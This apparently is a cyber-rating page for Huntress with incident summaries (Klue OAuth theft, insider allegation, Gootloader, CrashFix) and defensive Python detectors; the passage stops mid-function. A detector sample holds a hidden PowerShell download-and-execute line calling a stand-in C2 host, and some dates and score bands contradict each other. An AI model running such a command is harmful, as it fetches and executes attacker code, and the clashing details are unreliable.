Huntress Vendor Cyber Rating & Cyber Score
huntress.com
Protect Your Endpoints, Identities, Logs, and Employees. The fully managed security platform that combines endpoint detection and response, Microsoft 365 identity protection, a predictably affordable SIEM and science-based security awareness training. Powered by custom-built enterprise technology for mid-market enterprises, small businesses, and the MSPs that support them and delivered by unrivaled industry analysts in our 24/7 Security Operations Center. By delivering a suite of purpose-built solutions that meet budget, security, and peace-of-mind requirements, Huntress is how the globe’s most underresourced businesses defend against today’s cyberthreats. As long as hackers keep hacking, we keep hunting.

Huntress A.I CyberSecurity Scoring

Company Information
Website: https://www.huntress.com/demo?utm_source=linkedin&utm_medium=social&utm_campaign=cy25-10-camp-brand-global-broad-all-organic_social_bio
Employees: 847
Followers: 120,630
NAICS: 541514
Industry Type: Computer and Network Security
Homepage: huntress.com

Huntress Risk Score (AI oriented): 475/1000, grade C, rated Critical (Critical band: 0 to 549)
Updated: 30/06/2026

Current Score: 475 C (Critical). 7 incidents recorded, average impact -49.17 points per incident.
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JULY 2026: 476
JUNE 2026: 537 (before incident)
Breach, 25 Jun 2026 (Huntress)
Headline: Klue: Klue Hit by Double Extortion as Second Hacker Group Emerges
Summary: Klue Faces Unprecedented Dual Extortion Attack After Data Breach
Score after incident: 474 (Critical, -63)
Incident ID: KLU1782428022
Klue Faces Unprecedented Dual Extortion Attack After Data Breach

Vancouver-based market intelligence platform Klue has disclosed a rare and escalating cybersecurity crisis involving two criminal groups with conflicting extortion demands following a data breach. The incident, first reported by TechCrunch, is an unusual case of competing threats targeting the same victim, highlighting evolving tactics in cyber extortion. The breach initially involved a hacking group that stole sensitive customer data, including proprietary market research, competitive analysis, and strategic planning materials used by enterprise clients to track rivals. In a surprising turn, the original attackers later claimed they were deleting the stolen files, though Klue's customers were warned not to assume the threat had passed. Before any relief could set in, a second criminal group emerged, demanding ransom for the same compromised data.

The situation leaves Klue's enterprise clients, including sales and marketing teams at major corporations, in limbo, uncertain whether their highly sensitive business intelligence has been destroyed, leaked, or is now in the hands of multiple threat actors. The competitive intelligence sector handles particularly valuable data, such as go-to-market strategies and product roadmaps, which could cause significant damage if exposed. Security researchers note that while secondary markets for stolen data are not new, simultaneous, opposing claims from two criminal groups are highly unusual. The first group's alleged data deletion could be a face-saving exit or a genuine reversal, while the second group's demands suggest they either independently accessed Klue's systems or acquired the data from the original attackers. A deletion claim cannot be verified by the victim in any case, so the warning to customers not to assume the threat had passed is the prudent reading. Klue has not disclosed technical details of the breach, the scope of compromised data, or the number of affected customers.
The incident underscores the cascading risks of B2B SaaS breaches, where third-party vendors handling critical business intelligence become high-value targets. It also arrives amid growing enterprise concerns over vendor security postures, following high-profile breaches at platforms like Okta and LastPass.
INCIDENT DETAILS
Type: data breach, dual extortion (two groups demanding ransom for the same stolen data)
Motivation: financial gain, data extortion
Impact: data compromised: proprietary market research, competitive analysis, strategic planning materials, go-to-market strategies, product roadmaps; brand reputation impact: high
Data breach: proprietary market research, competitive analysis, strategic planning materials, go-to-market strategies, product roadmaps; sensitivity of data: high
JUNE 2026: 556 (before incident)
Cyber Attack, 17 Jun 2026 (Huntress)
Headline: Huntress, Salesforce and Klue: Klue OAuth breach linked to 'Icarus' Salesforce data theft attacks
Summary: Klue OAuth Breach Exposes Salesforce Data in Icarus Extortion Campaign
Score after incident: 536 (Critical, -20)
Incident ID: HUNSALKLU1781793603
Klue OAuth Breach Exposes Salesforce Data in Icarus Extortion Campaign

A recent OAuth breach at market intelligence platform Klue has enabled the Icarus threat group to steal Salesforce CRM data from multiple organizations as part of an ongoing extortion campaign. The attack, first reported by BleepingComputer and confirmed by cybersecurity firms ReliaQuest and Huntress, has prompted Salesforce to disable the Klue Battlecards integration while investigations continue.

### How the Attack Unfolded

Attackers compromised Klue's backend systems by leveraging a dormant but still valid credential from a prototype integration. Once inside, they deployed a malicious code update that harvested the OAuth tokens customers used to connect Klue Battlecards with third-party platforms, including Salesforce. Using these stolen tokens, the threat actors ran automated Python scripts against Salesforce's REST API for nearly 24 hours. Initial reconnaissance targeted the `/services/data/v59.0/sobjects` endpoint (object and schema discovery), followed by rapid data exfiltration via `/services/data/v59.0/query`. In one case the attackers sent nearly 1,000 queries in 15 minutes, shifting from stealthy reconnaissance to high-speed theft. Because the calls were made with legitimately issued OAuth tokens, a password reset alone does not cut off the access; the tokens themselves have to be revoked.

### Extortion Demands & Icarus Involvement

While the initial activity resembled past attacks by ShinyHunters, BleepingComputer confirmed that the Icarus group, active since April 2026, is behind the campaign. Victims received extortion emails from an alias "mr bean" with a Session Messenger ID for contact. Icarus's data leak site also teased the campaign with a post titled "Get Ready," warning of upcoming corporate listings. Huntress, one of the affected organizations, confirmed receiving a similar extortion email, with the provided Session ID matching Icarus's dark web leak site.

The stolen data includes business contacts, sales communications, price quotes, competitive intelligence reports, and account details, though no evidence suggests compromise of passwords, payment data, or engineering systems.

### Response & Mitigation

Klue has disabled integrations with Salesforce, HubSpot, SharePoint, Zoom, Gong, Chorus, Clari, Google Drive, and Slack while addressing the breach. Salesforce has also suspended the Klue Battlecards app, preventing new connections until further notice. Security firms have shared IP addresses linked to the attacks:
- 138.226.246.94
- 212.86.125.24
- 213.111.148.90
- 94.154.32.160

Organizations using Klue integrations are urged to review logs, revoke OAuth tokens, terminate active sessions, and monitor for unusual API activity.
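The log review recommended above can be scripted. The following is an added example, not Klue's, Salesforce's or Huntress's code: it runs over a constructed CSV whose column names (TIMESTAMP_DERIVED, USER_ID, CLIENT_IP, URI, CONNECTED_APP_ID) are an assumption loosely modelled on Salesforce EventLogFile RestApi events, so verify them against your own export. It flags the three things the incident description calls out: calls from the published attacker addresses, the sobjects-then-query sequence, and a burst of query calls in any 15-minute window.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Source addresses shared by ReliaQuest and Huntress for this campaign (from the page above).
ICARUS_IPS = {"138.226.246.94", "212.86.125.24", "213.111.148.90", "94.154.32.160"}

# The two endpoints named in the incident: schema discovery, then bulk SOQL queries.
SOBJECTS_URI = "/services/data/v59.0/sobjects"
QUERY_URI = "/services/data/v59.0/query"


def build_sample_log() -> str:
    """Constructed sample CSV, not real tenant data. Column names are an assumption
    loosely modelled on Salesforce EventLogFile RestApi fields; verify against your export."""
    rows = ["TIMESTAMP_DERIVED,USER_ID,CLIENT_IP,URI,CONNECTED_APP_ID"]
    day = datetime(2026, 6, 16, tzinfo=timezone.utc)
    # Normal integration traffic: one sync query per hour for twelve hours.
    for h in range(9, 21):
        t = day + timedelta(hours=h)
        rows.append(f"{t:%Y-%m-%dT%H:%M:%SZ},005A1,203.0.113.10,{QUERY_URI},0H4KLUE")
    # Attacker with a stolen token: slow schema recon, then 300 queries in ten minutes.
    recon = day + timedelta(hours=22)
    rows.append(f"{recon:%Y-%m-%dT%H:%M:%SZ},005B2,138.226.246.94,{SOBJECTS_URI},0H4KLUE")
    t = recon + timedelta(seconds=30)
    rows.append(f"{t:%Y-%m-%dT%H:%M:%SZ},005B2,138.226.246.94,{SOBJECTS_URI}/Account/describe,0H4KLUE")
    burst = recon + timedelta(minutes=5)
    for i in range(300):
        t = burst + timedelta(seconds=2 * i)
        rows.append(f"{t:%Y-%m-%dT%H:%M:%SZ},005B2,212.86.125.24,{QUERY_URI},0H4KLUE")
    return "\n".join(rows) + "\n"


def parse_events(text: str) -> list[dict]:
    """Read the CSV into dicts, adding a timezone-aware datetime under 'ts'."""
    events = []
    for row in csv.DictReader(io.StringIO(text)):
        row["ts"] = datetime.strptime(row["TIMESTAMP_DERIVED"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(row)
    return events


def ioc_hits(events: list[dict], iocs: set = ICARUS_IPS) -> dict:
    """API calls per known-bad source address (only addresses that actually appear)."""
    counts = defaultdict(int)
    for e in events:
        if e["CLIENT_IP"] in iocs:
            counts[e["CLIENT_IP"]] += 1
    return dict(counts)


def recon_then_exfil(events: list[dict]) -> list:
    """Users who issue query calls after a sobjects (schema discovery) call."""
    first_recon, flagged = {}, set()
    for e in sorted(events, key=lambda ev: ev["ts"]):
        uid = e["USER_ID"]
        if e["URI"].startswith(SOBJECTS_URI):
            first_recon.setdefault(uid, e["ts"])
        elif e["URI"].startswith(QUERY_URI) and uid in first_recon:
            flagged.add(uid)
    return sorted(flagged)


def query_bursts(events: list[dict], window: timedelta = timedelta(minutes=15), threshold: int = 200) -> list:
    """Per user, the densest sliding window of query calls, reported when it reaches
    threshold. The threshold is an assumption: set it well above the user's normal rate."""
    per_user = defaultdict(list)
    for e in events:
        if e["URI"].startswith(QUERY_URI):
            per_user[e["USER_ID"]].append(e["ts"])
    results = []
    for uid, times in per_user.items():
        times.sort()
        best, best_start, lo = 0, None, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:  # slide the left edge until the span fits the window
                lo += 1
            if hi - lo + 1 > best:
                best, best_start = hi - lo + 1, times[lo]
        if best >= threshold:
            results.append((uid, best_start, best))
    return results


if __name__ == "__main__":
    evs = parse_events(build_sample_log())
    print("IOC hits:", ioc_hits(evs))
    print("recon-then-query users:", recon_then_exfil(evs))
    for uid, start, n in query_bursts(evs):
        print(f"burst: user {uid} issued {n} query calls in 15 min starting {start:%H:%M:%SZ}")
```

The burst check uses a two-pointer sliding window per user, so it is linear in the number of events and does not depend on fixed clock-aligned buckets that a burst could straddle. Point it at a real EventLogFile export by replacing `build_sample_log()` with the file contents once the column names have been confirmed.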
INCIDENT DETAILS
Type: data breach, extortion
Motivation: extortion, data theft
Impact: data compromised: business contacts, sales communications, price quotes, competitive intelligence reports, account details; systems affected: Salesforce CRM, Klue Battlecards integration; operational impact: Klue disabled integrations with Salesforce, HubSpot, SharePoint, Zoom, Gong, Chorus, Clari, Google Drive, and Slack, and Salesforce suspended the Klue Battlecards app; payment information risk: no evidence of compromise
Data breach: type of data compromised: business contacts, sales communications, price quotes, competitive intelligence reports, account details; sensitivity: high (competitive intelligence, sales data); data exfiltration: yes, via Salesforce REST API queries; personally identifiable information: business contact details only (no evidence that passwords or payment data were taken)
JUNE 2026: 616 (before incident)
Breach, 01 Jun 2026 (Huntress)
Headline: Huntress and FBI: Huntress CEO says threat hunter used 'poor judgment' in alerting ransomware crim about law enforcement probe
Summary: Huntress Investigates Alleged Insider Threat After Employee Shared FBI Intel with Ransomware Operator
Score after incident: 554 (Critical, -62)
Incident ID: FBIHUN1782843828
Huntress Investigates Alleged Insider Threat After Employee Shared FBI Intel with Ransomware Operator

Huntress CEO Kyle Hanslovan has acknowledged "questionable" communications between a current threat hunter at the cybersecurity firm and a cybercriminal, describing the exchanges as a lapse in judgment. The incident surfaced after former Huntress analyst Ben Folland accused the employee of acting as an insider threat by allegedly sharing law enforcement details with Devman, a ransomware operator linked to Russia. According to Hanslovan's blog post, the employee disclosed to Devman that U.S. law enforcement had contacted them about the threat actor. While Hanslovan stated the disclosure was not illegal, he called it "poor judgment" and denied that it constituted insider activity. Huntress has since implemented stricter policies for researcher interactions with threat actors and taken administrative action, and says it found no evidence of illegal conduct or further disclosures.

Folland disputes this characterization. In a LinkedIn post, he claimed the employee forwarded FBI communications, including agent names, to Devman, warning the ransomware operator of an active investigation. He also alleged the employee refused to cooperate with law enforcement, a claim Folland says the FBI confirmed to him. Folland argued the actions went beyond poor judgment, equating them to an insider tipping off a criminal under investigation. Devman, known for using modified DragonForce ransomware built on leaked Conti source code, has been publicly targeting Folland and his family.

The FBI has not responded to requests for comment, and Huntress has declined further statements. The dispute highlights tensions over ethical boundaries in threat intelligence: Huntress maintains the employee's actions were not malicious, while Folland insists they meet the definition of an insider threat. The investigation remains ongoing.
INCIDENT DETAILS
Type: insider threat
Motivation: tipping off a criminal under investigation
Impact: data compromised: FBI communications, agent names; operational impact: stricter internal policies implemented; brand reputation impact: potential reputational damage from the insider-threat allegations
Data breach: type of data compromised: law enforcement communications, agent names; sensitivity: high (FBI investigation details); personally identifiable information: agent names
MAY 2026: 616
APRIL 2026: 610
MARCH 2026: 627 (before incident)
Cyber Attack, 04 Mar 2026 (Huntress)
Headline: Huntress: How a Brute Force Attack Unmasked a Ransomware Infrastructure Network
Summary: Huntress Uncovers Ransomware-as-a-Service Ecosystem Behind 'Routine' RDP Brute-Force Attack
Score after incident: 607 (Low, -20)
Incident ID: HUN1772642134
Huntress Uncovers Ransomware-as-a-Service Ecosystem Behind "Routine" RDP Brute-Force Attack

Security researchers at Huntress recently traced a seemingly ordinary Remote Desktop Protocol (RDP) brute-force attack to a sophisticated ransomware-as-a-service (RaaS) operation, exposing a network of initial access brokers and malicious infrastructure. The incident began when Huntress's SOC detected unusual domain enumeration activity on a network with an internet-exposed RDP server, a common but risky configuration. While brute-force attacks are frequent, this case stood out due to atypical behavior: the compromised account was accessed from multiple IP addresses, suggesting a single threat actor leveraging distributed infrastructure.

After gaining access, the attacker deviated from standard post-exploitation tactics. Instead of extracting credentials from Windows LSASS or the registry (the usual methods in ransomware intrusions), they manually searched file shares and text files for passwords, an unusual approach that hinted at a more targeted operation. Further investigation revealed the IP addresses involved were linked to known ransomware groups, including Hive and BlackSuit, as well as a suspicious VPN service (1vpns[.]com) marketed as "no-logs." The infrastructure included a web of geo-distributed servers under the domain specialsseason[.]com, with subdomains tied to multiple countries (e.g., NL-US.specialsseason[.]com, NL-RU.specialsseason[.]com). The naming convention and references to "big game hunting" (a term for high-value ransomware targeting) strongly indicated ties to RaaS operations. The findings underscore how initial access brokers operate at scale, using legitimate-seeming services to obscure their activities. Huntress's analysis also highlighted the value of digging beyond routine alerts, as even mundane incidents can reveal broader criminal ecosystems.

Key Indicators of Compromise (IOCs):
- IPs: 64.190.113[.]159, 147.135.36[.]162
- Domains: specialsseason[.]com, 1vpns[.]com
- Certificate fingerprints (SHA-256): 6bc8b8f260f9f9bfea69863ef8d3c525568676ddadc09c14655191cad1acdb5b, b884cce828f06fb936fd5809d5945d861401c606c4ebe894464c99e6473e9570
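The atypical behavior the analysts keyed on, one account failing and then succeeding from several source addresses, is cheap to detect from the Windows Security log. The following is an added example and not Huntress's detection logic: it runs over a constructed list of 4625 (failed logon) and 4624 (successful logon) records with LogonType 10 (RemoteInteractive, i.e. RDP), using the standard event property names rather than any particular SIEM's schema, and the thresholds are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_events() -> list[dict]:
    """Constructed Security-log records, not from a real host. Keys follow the
    Windows event properties: EventID 4625 = failed logon, 4624 = successful logon,
    LogonType 10 = RemoteInteractive (RDP)."""
    t0 = datetime(2026, 3, 1, 2, 0)
    events = []
    # One service account hammered from four addresses, round-robin, every 15 s ...
    sources = ["198.51.100.7", "198.51.100.8", "203.0.113.44", "192.0.2.99"]
    for i in range(80):
        events.append({"EventID": 4625, "TargetUserName": "svc_backup", "LogonType": 10,
                       "IpAddress": sources[i % len(sources)],
                       "TimeCreated": t0 + timedelta(seconds=15 * i)})
    # ... then successful RDP logons from two of those addresses within the hour.
    for ip, minutes in (("198.51.100.7", 25), ("203.0.113.44", 40)):
        events.append({"EventID": 4624, "TargetUserName": "svc_backup", "LogonType": 10,
                       "IpAddress": ip, "TimeCreated": t0 + timedelta(minutes=minutes)})
    # A normal user: two typos, then success, all from her usual workstation.
    for i in range(2):
        events.append({"EventID": 4625, "TargetUserName": "alice", "LogonType": 10,
                       "IpAddress": "10.0.0.5", "TimeCreated": t0 + timedelta(minutes=5, seconds=30 * i)})
    events.append({"EventID": 4624, "TargetUserName": "alice", "LogonType": 10,
                   "IpAddress": "10.0.0.5", "TimeCreated": t0 + timedelta(minutes=6)})
    return events


def distributed_rdp_compromise(events: list[dict], window: timedelta = timedelta(hours=1),
                               min_fail_ips: int = 3, min_success_ips: int = 2) -> dict:
    """Accounts that, within `window` of their first RDP failure, failed from at least
    min_fail_ips distinct addresses and succeeded from at least min_success_ips.
    The thresholds are assumptions; tune them to the environment."""
    by_user = defaultdict(list)
    for e in events:
        if e["LogonType"] == 10 and e["EventID"] in (4624, 4625):
            by_user[e["TargetUserName"]].append(e)

    findings = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda ev: ev["TimeCreated"])
        fails = [e for e in evs if e["EventID"] == 4625]
        if not fails:
            continue
        start = fails[0]["TimeCreated"]
        in_window = [e for e in evs if start <= e["TimeCreated"] <= start + window]
        fail_ips = {e["IpAddress"] for e in in_window if e["EventID"] == 4625}
        # Only successes after the first failure are in the window, i.e. guesses that paid off.
        success_ips = {e["IpAddress"] for e in in_window if e["EventID"] == 4624}
        if len(fail_ips) >= min_fail_ips and len(success_ips) >= min_success_ips:
            findings[user] = {
                "failures": sum(1 for e in in_window if e["EventID"] == 4625),
                "failed_from": sorted(fail_ips),
                "succeeded_from": sorted(success_ips),
                # Addresses that both failed and then succeeded: the strongest brute-force signal.
                "guessed_from": sorted(fail_ips & success_ips),
            }
    return findings


if __name__ == "__main__":
    for user, detail in distributed_rdp_compromise(build_sample_events()).items():
        print(user, detail)
```

Single-source brute forcing is already covered by most lockout policies; the point of keying on distinct source addresses is that a distributed attacker stays under per-IP rate limits while still producing an account-level pattern. In production, feed the function events exported from the Security channel (for example via a SIEM query for EventID 4624/4625 with LogonType 10) rather than the constructed sample.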
INCIDENT DETAILS
Type: ransomware (RaaS ecosystem; the observed intrusion itself was an RDP brute force)
Motivation: financial gain (ransomware-as-a-service)
FEBRUARY 2026: 624
JANUARY 2026: 623
DECEMBER 2025: 728 (before incident)
Ransomware, 01 Dec 2025 (Huntress)
Headline: Huntress: Ex-Huntress analyst claims company insider fed info to a ransomware crim. Social media drama ensues
Summary: Huntress Faces Allegations of Insider Threat Linked to Ransomware Group
Score after incident: 618 (Critical, -110)
Incident ID: HUN1782426290
Huntress Faces Allegations of Insider Threat Linked to Ransomware Group

Security firm Huntress is embroiled in controversy after a former employee, Ben Folland, accused the company of concealing an insider threat involving a current employee who allegedly leaked information to a ransomware operation. Folland, who left Huntress in February, took to LinkedIn to detail his claims, which stem from an incident unrelated to the recent supply-chain attack on Klue (a separate breach Huntress disclosed last week). According to Folland, in December 2025 he discovered that a Huntress employee had shared communications from U.S. law enforcement with a cybercriminal known as DevMan, a ransomware operator targeting Folland and his family. DevMan, which emerged in April 2025, is believed to use modified DragonForce ransomware code. Folland alleged the insider was "caught by the FBI" but remains employed at Huntress, raising concerns about ongoing risks to clients and to the company's reputation, particularly as Huntress prepares for an IPO.

In a resignation letter posted online, Folland stated he left due to "personal reasons and a conflict of interest," later clarifying that Huntress had attempted to "silence" him with legal threats after he raised the issue. He pledged to release evidence over the next two weeks, including FBI communications, internal memos, and recorded conversations between the Huntress employee and DevMan.

Huntress CEO Kyle Hanslovan responded through a spokesperson, acknowledging the concerns but framing the incident as a case of "poor judgment" in communications with a cybercriminal. He emphasized that such interactions are sometimes necessary for threat intelligence gathering but assured stakeholders that the company takes the matter seriously. Hanslovan disputed Folland's characterization of an "insider threat," calling the claims inaccurate and denying that Huntress prioritized its IPO over security. He noted that legal and law enforcement constraints limit public disclosure but hinted at an official statement in the future. The allegations highlight tensions between transparency and operational security in cybersecurity firms, particularly when insider risks intersect with criminal investigations. The outcome may set a precedent for how companies handle similar breaches of trust.
INCIDENT DETAILS
Type: insider threat, ransomware
Motivation: financial gain, retaliation
Impact: data compromised: law enforcement communications, internal memos, recorded conversations (as alleged by Folland); operational impact: reputational damage, legal threats, potential client risk; brand reputation impact: high; legal liabilities: potential
Data breach: type of data compromised: law enforcement communications, internal memos, recorded conversations; sensitivity: high
NOVEMBER 2025: 747 (before incident)
Cyber Attack, 01 Nov 2025 (Huntress)
Headline: Huntress, Rhysida and Expel: Gootloader Malware Maintains Low Detection Rate While Bypassing Most Security Tools
Summary: Gootloader's Sophisticated Anti-Detection Tactics Exposed in Latest Campaign
Score after incident: 727 (Low, -20)
Incident ID: HUNREDEXP1768977371
Gootloader's Sophisticated Anti-Detection Tactics Exposed in Latest Campaign

A recent analysis by Huntress and Expel reveals how the Gootloader malware leverages deliberately malformed ZIP archives to evade security tools while remaining functional for targeted victims. The threat actor, known for its role as an initial access broker in ransomware operations, has partnered with Vanilla Tempest, a group deploying Rhysida ransomware, in an ongoing campaign active since November 2025.

### Evasion Through Malformed ZIP Archives

Gootloader's infection chain begins with weaponized ZIP files containing malicious JScript payloads, such as "Indiana_Animal_Protection_Laws_Guide.js." These archives are engineered to break analysis tools such as 7-Zip and WinRAR while remaining extractable with Windows' native unarchiving utility. Key evasion techniques include:
- Concatenated ZIP structures: each archive contains 500–1,000 nested ZIP files, with the End of Central Directory (EOCD) record strategically placed to direct extraction to the valid payload.
- Truncated EOCD records: missing critical bytes violate the ZIP format specification, causing parsing failures in security tools.
- Randomized metadata: mismatched version numbers, timestamps, CRC32 checksums, and file sizes between local file headers and central directory records further disrupt analysis.
- Client-side generation: victims receive XOR-encoded data blobs that the browser decodes and assembles into identical ZIP structures until the file reaches 70–80 MB, even though the extracted JScript payload is only ~287 KB.

### Execution & Persistence

When victims extract and run the JScript file, Windows Script Host (wscript.exe) executes it from `AppData\Local\Temp`, initiating a multi-stage attack:
1. Persistence: creates LNK shortcuts in the Startup folder, referencing secondary scripts via NTFS short filenames (e.g., `FILENA~1.js`).
2. Obfuscated PowerShell execution: cscript.exe launches the secondary script, which spawns PowerShell processes with heavily obfuscated commands to establish command-and-control (C2) communications.

### Detection & Indicators of Compromise

Security teams can identify Gootloader activity by monitoring:
- Process patterns: `wscript.exe` executing JScript from temp directories, followed by `cscript.exe` invoking scripts via NTFS short names and spawning PowerShell.
- File characteristics: ZIP archives with more than 100 occurrences of `PK\x03\x04` (local file header signature) or `PK\x05\x06` (EOCD signature); a well-formed archive has exactly one EOCD record.
- Persistence artifacts: LNK files in `\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\`.

Known IOCs:
- File hash (SHA-256): `b05eb7a367b5b86f8527af7b14e97b311580a8ff73f27eaa1fb793abb902dc6e`
- Malicious extensions: `.js`, `.jse`
- Execution paths: temp directories, NTFS short-name scripts

Gootloader remains a persistent threat, historically accounting for 11% of malware that bypasses enterprise security solutions. Its collaboration with Vanilla Tempest underscores its role in facilitating Rhysida ransomware attacks.
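The file-characteristic rule above (more than 100 local-file-header or EOCD signatures in one archive) is best implemented as a raw byte scan rather than through a ZIP library, because the archives are built precisely so that parsers give up. The following is an added example, not Huntress's or Expel's code: the sample archives are constructed in memory with Python's zipfile module (one clean archive; one that glues 150 copies together and cuts the final EOCD record short, imitating the concatenation and truncation tricks; one with a CRC32 that disagrees between the local header and the central directory), and the threshold of 100 is the one quoted above.

```python
import io
import struct
import zipfile

LFH, CDH, EOCD = b"PK\x03\x04", b"PK\x01\x02", b"PK\x05\x06"
EOCD_MIN_LEN = 22  # fixed part of the End of Central Directory record


def make_clean_zip(name: str = "Indiana_Animal_Protection_Laws_Guide.js",
                   body: bytes = b"WScript.Echo('constructed sample');") -> bytes:
    """A small, well-formed archive (constructed sample; the name echoes the lure file above)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(name, body)
    return buf.getvalue()


def make_concatenated_zip(copies: int = 150, truncate_eocd: bool = True) -> bytes:
    """Imitates the evasion: many archives glued together, last EOCD cut short."""
    data = make_clean_zip() * copies
    return data[:-4] if truncate_eocd else data


def tamper_lfh_crc(data: bytes) -> bytes:
    """Flip the CRC32 in the first local file header (offset 14) so it disagrees with the CD."""
    return data[:14] + bytes([data[14] ^ 0xFF]) + data[15:]


def scan_zip(data: bytes, max_sig: int = 100) -> dict:
    """Parser-free triage: count signatures and sanity-check the final EOCD record."""
    n_lfh, n_cdh, n_eocd = data.count(LFH), data.count(CDH), data.count(EOCD)
    reasons = []
    if n_lfh > max_sig or n_eocd > max_sig:
        reasons.append(f"concatenated archive: {n_lfh} local headers, {n_eocd} EOCD records")

    last = data.rfind(EOCD)
    eocd_truncated = last == -1 or len(data) - last < EOCD_MIN_LEN
    crc_mismatch = False
    if eocd_truncated:
        reasons.append("final EOCD record missing or truncated")
    else:
        # EOCD after the signature: disk(2) cd_disk(2) entries_disk(2) entries(2) cd_size(4) cd_offset(4) comment_len(2)
        _, _, _, _, _, cd_offset, _ = struct.unpack("<HHHHIIH", data[last + 4:last + 22])
        if data[cd_offset:cd_offset + 4] != CDH:
            reasons.append("EOCD central-directory offset does not point at a CD header")
        elif data[:4] == LFH:
            # First entry only: CRC32 sits at offset 14 in the LFH and at 16 in the CD header.
            crc_mismatch = data[14:18] != data[cd_offset + 16:cd_offset + 20]
            if crc_mismatch:
                reasons.append("CRC32 differs between local header and central directory")

    return {"lfh": n_lfh, "cdh": n_cdh, "eocd": n_eocd, "eocd_truncated": eocd_truncated,
            "crc_mismatch": crc_mismatch, "suspicious": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, blob in (("clean", make_clean_zip()),
                        ("concatenated+truncated", make_concatenated_zip()),
                        ("crc-tampered", tamper_lfh_crc(make_clean_zip()))):
        print(label, scan_zip(blob))
```

The signature count is what catches the concatenation; the offset check only fires when the last EOCD points somewhere that is not a central-directory header, and a concatenated file whose copies share layout can still pass it, which is exactly why the page's rule is a count rather than a structural check. The CRC comparison covers only the first entry; extend it to walk the central directory if you want per-entry coverage.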
INCIDENT DETAILS
Type: malware campaign
Motivation: initial access for ransomware operations (Rhysida ransomware deployment)
Data breach: malicious file types observed: .js, .jse
OCTOBER 2025: 747
SEPTEMBER 2025: 747
AUGUST 2025: 746
JANUARY 2025: 759 (before incident)
Cyber Attack, 01 Jan 2025 (Huntress)
Headline: Huntress: 'CrashFix' Scam Crashes Browsers, Delivers Malware
Summary: Sophisticated 'CrashFix' Campaign Targets Corporate Networks with ModeloRAT Malware
Score after incident: 742 (Low, -17)
Incident ID: HUN1769991856
Sophisticated "CrashFix" Campaign Targets Corporate Networks with ModeloRAT Malware

Cybersecurity firm Huntress has uncovered a highly evolved malware campaign attributed to the threat actor KongTuke, which has been active since early 2025. The latest operation, dubbed "CrashFix," demonstrates a marked increase in sophistication, targeting corporate systems with a multi-stage attack chain while deploying a separate, less refined infection method for home users.

### Key Components of the Attack

1. NexShield malicious extension: a near-identical replica of the legitimate uBlock Origin Lite ad blocker, distributed via malicious ads. Once installed, the extension remains dormant for an hour before intentionally crashing the browser by flooding the system with connection requests, exhausting memory and CPU.
2. CrashFix social engineering: after the crash, victims are presented with a fake security warning instructing them to execute a "repair" command via the Windows Run dialog. This command launches a PowerShell script that contacts the attacker's command-and-control (C2) server, initiating the infection.
3. ModeloRAT (Python-based RAT): deployed only on domain-joined corporate systems, this previously unseen remote access Trojan (RAT) conducts extensive reconnaissance, collecting:
   - operating system details
   - running processes
   - network configuration
   - user privileges
   - installed security tools (e.g., antivirus, virtual machine indicators)
   ModeloRAT uses RC4 for its C2 traffic and establishes persistence by modifying Windows Registry keys, often masquerading as legitimate applications such as Spotify or Discord to evade detection.

### Targeting & Tactics

- Corporate systems (VIP treatment): KongTuke prioritizes enterprise networks, where compromised systems provide access to Active Directory, internal resources, and sensitive data. The malware's advanced capabilities suggest a focus on high-value targets with greater potential for financial or espionage gains.
- Home users (test payloads): non-domain systems receive a separate, less polished infection chain. Huntress researchers observed C2 responses labeled "TEST PAYLOAD!!!!", indicating this branch may still be in development or a lower priority.
- Anti-analysis techniques: the fake "repair" pop-up blocks keyboard shortcuts, disables developer tools, and prevents text selection to hinder investigation.

### Discovery & Indicators of Compromise

The campaign was uncovered when a researcher searching for an ad blocker was redirected via a malicious ad to the fraudulent NexShield extension in the Chrome Web Store. Huntress has published indicators of compromise (IoCs), advising organizations to monitor for:
- unusual use of legitimate Windows utilities (e.g., PowerShell launched from the Run dialog)
- suspicious browser extensions with excessive permissions or recent creation dates
- Registry Run key entries mimicking legitimate software
- Python commands spawning hidden PowerShell processes

### Why This Matters

KongTuke's shift toward enterprise-focused attacks reflects a broader trend of threat actors prioritizing corporate networks for higher returns. The CrashFix technique, which exploits user frustration by creating a problem and then offering a "solution", demonstrates a self-sustaining infection loop that increases the likelihood of successful compromise. With ModeloRAT's advanced reconnaissance and evasion tactics, this campaign poses a significant risk to organizations with domain-joined endpoints.
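Two of the hunting tips above, Run-key entries that mimic legitimate software and autoruns that launch a script interpreter with hidden-window flags, can be checked with a small heuristic over exported autorun values. The following is an added example, not Huntress's published detection: the Run-key entries are constructed, the expected install locations for Spotify and Discord are an assumption for the example rather than vendor-confirmed paths, and the command-line parsing is deliberately simple. On Windows it reads the live HKCU Run key through the standard winreg module; elsewhere it falls back to the constructed sample.

```python
import re

# What the real installers are expected to register: an assumption for this example,
# not a vendor-confirmed path. Adjust to what a clean build actually shows.
EXPECTED_AUTORUNS = {
    "spotify": ("spotify.exe", ("\\appdata\\roaming\\spotify\\",)),
    "discord": ("update.exe", ("\\appdata\\local\\discord\\",)),
}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "python.exe", "pythonw.exe",
                "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
HIDDEN_FLAGS = re.compile(r"-(w|windowstyle)\s+hidden|-enc(odedcommand)?\b|-nop\b|-noprofile\b", re.I)

# Constructed Run-key values, not from a real machine.
SAMPLE_RUN_ENTRIES = {
    "Spotify": r'"C:\Users\alice\AppData\Roaming\Spotify\Spotify.exe" /background',
    "Discord": r'C:\Users\alice\AppData\Local\Discord\Update.exe --processStart Discord.exe',
    "Spotify Helper": r'"C:\ProgramData\Spotify\Spotify.exe" /background',
    "DiscordUpdater": r'C:\Users\alice\AppData\Local\Programs\Python\Python312\pythonw.exe C:\Users\alice\AppData\Roaming\Discord\update.py',
    "OneDriveSync": r'powershell.exe -w hidden -nop -c "iex (iwr http://c2.example.invalid/p)"',
}


def executable_of(command: str) -> str:
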